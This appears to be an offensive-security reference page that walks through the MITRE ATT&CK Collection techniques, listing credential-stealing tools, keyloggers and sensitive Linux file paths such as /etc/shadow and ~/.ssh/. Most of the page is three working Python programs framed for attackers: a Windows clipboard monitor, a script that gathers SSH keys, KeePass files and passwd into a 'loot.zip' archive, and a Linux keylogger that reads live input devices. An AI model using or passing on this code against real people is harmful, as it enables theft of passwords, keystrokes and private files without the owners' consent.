Collection

  • MITRE ATT&CK - Collection
    • Collection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.

Audio Capture

  • Audio Capture - ATT&CK
    • An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
    • Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

Windows


Automated Collection

  • Automated Collection - ATT&CK
    • Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.

Linux

  • LaZagne
    • The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

Mac

  • LaZagne
    • The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

Windows

  • LaZagne
    • The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
  • BrowserGatherer
    • Fileless Extraction of Sensitive Browser Information with PowerShell
  • SessionGopher
    • SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.
  • KeeFarce
    • Extracts passwords from a KeePass 2.x database, directly from memory.
  • KeeThief
    • Methods for attacking KeePass 2.X databases, including extracting of encryption key material from memory.

Browser Extensions

  • Browser Extensions - ATT&CK
    • Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.

Clipboard Data

  • Clipboard Data - ATT&CK
    • Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
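The Windows clipboard is read through a short Win32 sequence (OpenClipboard, GetClipboardData for CF_UNICODETEXT, GlobalLock, copy, GlobalUnlock, CloseClipboard), and a collector simply polls it and records each new value. The following is an added example written for this page, not code from ATT&CK or any tool listed here; the Win32 reader only works on Windows, so the demo replays a constructed sequence of clipboard states through the same monitor to show the change-detection logic. The sample strings and the 10.0.0.5 address are constructed.

```python
import ctypes
import time
from typing import Callable, List, Optional, Tuple

CF_UNICODETEXT = 13   # clipboard format: NUL-terminated UTF-16 text


def read_windows_clipboard() -> Optional[str]:
    """Return the clipboard's text via the Win32 API, or None when it holds no text.

    OpenClipboard -> GetClipboardData(CF_UNICODETEXT) -> GlobalLock -> copy the
    wide string -> GlobalUnlock -> CloseClipboard. Windows only: ctypes.windll
    does not exist on other platforms, so this is only called there.
    """
    user32, kernel32 = ctypes.windll.user32, ctypes.windll.kernel32
    user32.GetClipboardData.restype = ctypes.c_void_p    # HANDLE is pointer-sized
    kernel32.GlobalLock.restype = ctypes.c_void_p
    kernel32.GlobalLock.argtypes = [ctypes.c_void_p]
    kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p]
    if not user32.OpenClipboard(None):                   # another app may hold it open
        return None
    try:
        handle = user32.GetClipboardData(CF_UNICODETEXT)
        if not handle:
            return None                                  # no text on the clipboard
        ptr = kernel32.GlobalLock(handle)
        if not ptr:
            return None
        try:
            return ctypes.wstring_at(ptr)
        finally:
            kernel32.GlobalUnlock(handle)
    finally:
        user32.CloseClipboard()


class ClipboardMonitor:
    """Poll a reader and record each distinct clipboard value once, with a timestamp."""

    def __init__(self, reader: Callable[[], Optional[str]] = read_windows_clipboard,
                 clock: Callable[[], float] = time.time):
        self._reader, self._clock = reader, clock
        self._last: Optional[str] = None
        self.captured: List[Tuple[float, str]] = []

    def poll(self) -> Optional[str]:
        """One round: returns the new text if the clipboard changed, else None."""
        try:
            text = self._reader()
        except OSError:                                  # reader failed; try again later
            return None
        if text is None or text == self._last:           # empty, or unchanged since last poll
            return None
        self._last = text
        self.captured.append((self._clock(), text))
        return text

    def run(self, interval_s: float = 0.5, rounds: Optional[int] = None) -> None:
        """Poll until `rounds` is exhausted (forever when None)."""
        done = 0
        while rounds is None or done < rounds:
            text = self.poll()
            if text is not None:
                print(f"[{time.strftime('%H:%M:%S')}] {text!r}")
            time.sleep(interval_s)
            done += 1


def demo() -> List[str]:
    """Replay a constructed sequence of clipboard states (sample data, not real)."""
    states = iter(["user@corp.example", "user@corp.example", "Hunter2!", None,
                   "Hunter2!", "ssh -i ops.key root@10.0.0.5"])
    mon = ClipboardMonitor(reader=lambda: next(states), clock=lambda: 0.0)
    for _ in range(6):
        mon.poll()
    return [text for _ts, text in mon.captured]
```

On a Windows host `ClipboardMonitor().run()` uses the Win32 reader; on Linux or macOS the same monitor can be given a reader that shells out to `xclip -o` or `pbpaste`. Note that the monitor keeps a value only when it differs from the previous poll, so a value copied twice in a row is recorded once.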

Windows

Linux

Mac


Data Staged

  • Data Staged - ATT&CK
    • Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Data from Local System

  • Data from Local System - ATT&CK
    • Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration. Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

Windows

  • SearchForCC
    • A collection of open source/common tools/scripts to perform a system memory dump and/or process memory dump on Windows-based PoS systems and search for unencrypted credit card track data.

Linux

  • List:
    • /etc/passwd : Contains local Linux users.
    • /etc/shadow : Contains local account password hashes (normally readable only by root).
    • /etc/group : Contains local account groups.
    • /etc/init.d/ : Contains service init scripts - worth a look to see what's installed.
    • /etc/hostname : System hostname.
    • /etc/network/interfaces : Network interfaces.
    • /etc/resolv.conf : System DNS servers.
    • /etc/profile : System-wide environment variables for login shells.
    • ~/.ssh/ : SSH keys and known_hosts.
    • ~/.bash_history : User's bash history log.
    • /var/log/ : Linux system log files are typically stored here.
    • /var/adm/ : UNIX system log files are typically stored here.
    • /var/log/apache2/access.log & /var/log/httpd/access.log : Typical Apache access log paths.
    • /etc/fstab : File system mounts.
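Automated Collection, Data Staged and Data from Local System are in practice one loop: search the file system for files matching criteria (name pattern, size, age), copy hits plus a fixed list of known-interesting paths such as the /etc and ~ files above into a staging directory, and compress the result. The following is an added example written for this page, not code from ATT&CK or from any tool listed here. The `demo()` function builds a constructed sample tree in a temporary directory (including a fake passwd file) so the run is offline and repeatable; the patterns and the 365-day / 1000-byte limits are illustrative choices.

```python
import fnmatch
import os
import shutil
import tempfile
import time
import zipfile
from pathlib import Path


def find_candidates(roots, patterns, max_bytes=50_000_000, max_age_days=None, exclude=()):
    """Yield files under `roots` whose lower-cased name matches one of the
    (lower-case) fnmatch `patterns`, is at most `max_bytes`, and, when
    `max_age_days` is set, was modified within that window. Directories in
    `exclude` are pruned so a staging area is never re-collected."""
    cutoff = None if max_age_days is None else time.time() - max_age_days * 86400
    skip = {Path(p).resolve() for p in exclude}
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
            if Path(dirpath).resolve() in skip:
                dirnames[:] = []
                continue
            for name in filenames:
                if not any(fnmatch.fnmatch(name.lower(), pat) for pat in patterns):
                    continue
                path = Path(dirpath) / name
                try:
                    st = path.stat()
                except OSError:            # dangling symlink, EACCES, ...
                    continue
                if st.st_size > max_bytes or (cutoff is not None and st.st_mtime < cutoff):
                    continue
                yield path


def stage_files(files, staging_dir):
    """Copy files into `staging_dir`, mirroring each absolute path (minus the
    root or drive) so two files with the same basename cannot collide."""
    staged = []
    for src in files:
        src = Path(src).resolve()
        dst = Path(staging_dir).joinpath(*src.parts[1:])
        try:
            dst.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(src, dst)         # keeps mtime for later triage
        except OSError:                    # e.g. /etc/shadow without root
            continue
        staged.append(dst)
    return staged


def build_archive(staging_dir, archive_path):
    """Zip the staging tree into one file (kept outside `staging_dir`);
    returns the number of files archived."""
    staging_dir = Path(staging_dir)
    count = 0
    with zipfile.ZipFile(archive_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for path in sorted(staging_dir.rglob("*")):
            if path.is_file():
                zf.write(path, path.relative_to(staging_dir).as_posix())
                count += 1
    return count


def collect(roots, patterns, explicit, staging_dir, archive_path, **criteria):
    """One run: criteria-based search plus an explicit list of known paths
    (e.g. /etc/passwd, ~/.bash_history), then stage and compress."""
    found = list(find_candidates(roots, patterns, exclude=[staging_dir], **criteria))
    found += [Path(p) for p in explicit if Path(p).is_file()]
    staged = stage_files(found, staging_dir)
    return {"found": len(found), "staged": len(staged),
            "archived": build_archive(staging_dir, archive_path)}


def demo():
    """Constructed sample tree (not real data) hitting each criterion once."""
    base = Path(tempfile.mkdtemp(prefix="collect_demo_"))
    home, etc = base / "home", base / "fake_etc"
    for rel, size in (("docs/budget.xlsx", 300), ("docs/notes.txt", 300),
                      ("docs/old.docx", 300), ("downloads/big.pdf", 5000),
                      (".ssh/id_rsa", 300)):
        (home / rel).parent.mkdir(parents=True, exist_ok=True)
        (home / rel).write_bytes(b"x" * size)
    old = time.time() - 400 * 86400
    os.utime(home / "docs/old.docx", (old, old))      # outside the 365-day window
    etc.mkdir()
    (etc / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
    result = collect([home], ("*.docx", "*.xlsx", "*.pdf", "*.kdbx", "id_rsa*"),
                     [etc / "passwd"], base / "staging", base / "loot.zip",
                     max_bytes=1000, max_age_days=365)
    with zipfile.ZipFile(base / "loot.zip") as zf:
        result["names"] = sorted(n.rsplit("/", 1)[-1] for n in zf.namelist())
    shutil.rmtree(base)
    return result


if __name__ == "__main__":
    print(demo())
```

In the demo, notes.txt fails the pattern, big.pdf the size cap and old.docx the age window, so only budget.xlsx, id_rsa and the explicit passwd file reach the archive. `found` and `staged` can differ on a real host when a match (such as /etc/shadow) is not readable by the current user. Scheduling the run at intervals is just a loop around `collect()`; the same walk works unchanged over a mounted network share.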

Data from Network Shared Drive

  • Data from Network Shared Drive - ATT&CK
    • Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Windows


Data from Removable Media

  • Data from Removable Media - ATT&CK
    • Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Adversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.

Linux

OS X

Windows


Email Collection

  • Email Collection - ATT&CK
    • Adversaries may target user email to collect sensitive information from a target.
    • Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
    • Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
    • Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.

Windows


Input Capture

  • Input Capture - ATT&CK
    • Adversaries can use methods of capturing user input, including keylogging and user input field interception, to obtain credentials for Valid Accounts and for information Collection.
    • Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes (Adventures of a Keystroke), but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider (Wrightson 2012).
    • Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
    • Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts, or as part of the initial compromise by exploitation of the externally facing web service (Volexity Virtual Private Keylogging).

Linux

  • How to Monitor Keyboard Keystrokes Using ‘LogKeys’ in Linux
  • logkeys - a GNU/Linux keylogger
    • logkeys is a Linux keylogger. It is no more advanced than other available Linux keyloggers, notably lkl and uberkey, but it is a bit newer and more up to date, it doesn't unreliably repeat keys, and it shouldn't crash your X. All in all, it just seems to work. It relies on the event interface of the Linux input subsystem. Once completely set up, it logs all common character and function keys, while also being fully aware of Shift and AltGr key modifiers.
  • keysniffer: trace pressed keys in debugfs
  • SKeylogger
    • SKeylogger is a simple keylogger. I had previously been using a few other open source keyloggers, but they stopped working when I upgraded my operating system. I tried to look through the code of those keyloggers, but it was undocumented, messy, and complex. I decided to make my own highly documented and very simple keylogger.
  • Using xkeyscan to Parse an X-Based Linux Keylogger
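The Linux keyloggers above (logkeys, keysniffer) work off the kernel's event interface: each read from /dev/input/eventN returns fixed-size `struct input_event` records, and the tool turns EV_KEY presses into characters while tracking modifier state. The following is an added example written for this page, not code from logkeys or any project listed here. It assumes the x86-64 record layout (two 64-bit timeval fields, then u16 type, u16 code, s32 value; 32-bit kernels use a 16-byte record), a US keyboard layout, and that the keyboard's event node is known (the default path /dev/input/event0 is a placeholder; the real one is listed in /proc/bus/input/devices). The sample stream is constructed so the decoder runs offline; reading a live node needs root or, typically, membership in the input group.

```python
import struct
import sys

# struct input_event on x86-64 Linux (assumed): int64 tv_sec, int64 tv_usec,
# u16 type, u16 code, s32 value  ->  24 bytes, little-endian
EVENT_FMT = "<qqHHi"
EVENT_SIZE = struct.calcsize(EVENT_FMT)
EV_KEY = 0x01                                 # key/button event type
KEY_RELEASE, KEY_PRESS, KEY_REPEAT = 0, 1, 2  # meaning of `value` for EV_KEY
KEY_BACKSPACE, KEY_TAB, KEY_ENTER = 14, 15, 28
KEY_LEFTSHIFT, KEY_RIGHTSHIFT, KEY_SPACE = 42, 54, 57


def _us_keymap():
    """Key code -> (unshifted, shifted) for the printable keys of a US layout."""
    km = {}
    for base, plain, shifted in (
        (2, "1234567890-=", "!@#$%^&*()_+"),   # KEY_1 .. KEY_EQUAL
        (16, "qwertyuiop[]", "QWERTYUIOP{}"),  # KEY_Q .. KEY_RIGHTBRACE
        (30, "asdfghjkl;'`", 'ASDFGHJKL:"~'),  # KEY_A .. KEY_GRAVE
        (43, "\\zxcvbnm,./", "|ZXCVBNM<>?"),   # KEY_BACKSLASH .. KEY_SLASH
    ):
        for off, pair in enumerate(zip(plain, shifted)):
            km[base + off] = pair
    km[KEY_SPACE], km[KEY_ENTER], km[KEY_TAB] = (" ", " "), ("\n", "\n"), ("\t", "\t")
    return km


US_KEYMAP = _us_keymap()


class KeyDecoder:
    """Stateful decoder: feed raw evdev bytes, get back the text that was typed."""

    def __init__(self, keymap=US_KEYMAP):
        self._keymap = keymap
        self._shift = 0        # number of Shift keys currently held
        self._pending = b""    # partial record carried over between reads

    def feed(self, raw: bytes) -> str:
        data = self._pending + raw
        usable = len(data) - len(data) % EVENT_SIZE
        self._pending = data[usable:]
        out = []
        for off in range(0, usable, EVENT_SIZE):
            _sec, _usec, etype, code, value = struct.unpack_from(EVENT_FMT, data, off)
            if etype != EV_KEY:                      # EV_SYN, EV_MSC, ... carry no keys
                continue
            if code in (KEY_LEFTSHIFT, KEY_RIGHTSHIFT):
                if value == KEY_PRESS:
                    self._shift += 1
                elif value == KEY_RELEASE:
                    self._shift = max(0, self._shift - 1)
                continue
            if value == KEY_RELEASE:                 # only presses and auto-repeats type
                continue
            if code == KEY_BACKSPACE:                # show text as the user ended up seeing it
                if out:
                    out.pop()
                continue
            pair = self._keymap.get(code)
            out.append(pair[1 if self._shift else 0] if pair else f"<KEY_{code}>")
        return "".join(out)


def decode_events(raw: bytes) -> str:
    """Decode a complete captured stream in one go."""
    return KeyDecoder().feed(raw)


def make_event(code: int, value: int, etype: int = EV_KEY) -> bytes:
    """Build one input_event record (timestamps zeroed) for the constructed sample."""
    return struct.pack(EVENT_FMT, 0, 0, etype, code, value)


def sample_stream() -> bytes:
    """Constructed capture of a user typing 'Hi 1!' then Enter, including the
    EV_SYN and EV_MSC records a real keyboard interleaves."""
    ev = make_event
    return b"".join([
        ev(KEY_LEFTSHIFT, KEY_PRESS), ev(0, 0, etype=0),                     # Shift, SYN_REPORT
        ev(35, KEY_PRESS), ev(35, KEY_RELEASE), ev(KEY_LEFTSHIFT, KEY_RELEASE),  # 'H'
        ev(23, KEY_PRESS), ev(23, KEY_RELEASE),                              # 'i'
        ev(KEY_SPACE, KEY_PRESS), ev(KEY_SPACE, KEY_RELEASE),
        ev(2, KEY_PRESS), ev(2, KEY_RELEASE),                                # '1'
        ev(KEY_LEFTSHIFT, KEY_PRESS), ev(2, KEY_PRESS), ev(2, KEY_RELEASE),
        ev(KEY_LEFTSHIFT, KEY_RELEASE),                                      # Shift+1 -> '!'
        ev(KEY_ENTER, KEY_PRESS), ev(KEY_ENTER, KEY_RELEASE),
        ev(4, 0x1c, etype=4),                                                # EV_MSC scancode
    ])


def tail_device(path: str) -> None:
    """Follow a live keyboard node; placeholder default path, see /proc/bus/input/devices."""
    dec = KeyDecoder()
    with open(path, "rb", buffering=0) as dev:
        while chunk := dev.read(EVENT_SIZE * 16):
            text = dec.feed(chunk)
            if text:
                sys.stdout.write(text)
                sys.stdout.flush()


if __name__ == "__main__":
    tail_device(sys.argv[1] if len(sys.argv) > 1 else "/dev/input/event0")
```

Unknown codes (Ctrl, Alt, function keys) are emitted as `<KEY_nn>` tokens rather than dropped, because a Ctrl+C or Alt+Tab between two words is often what tells an operator where one input field ended. The decoder keeps a partial trailing record between reads, which matters on a live node where `read()` is not guaranteed to return whole multiples of 24 bytes.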

Windows

Man in the Browser

  • Man in the Browser - ATT&CK
    • Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
    • A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.
    • Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened, and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and for which the browser has sufficient permissions, such as SharePoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication.

Screen Capture

  • Screen Capture - ATT&CK
    • Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.

Linux

Mac

Windows


Video Capture

  • Video Capture - ATT&CK
    • An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.

Windows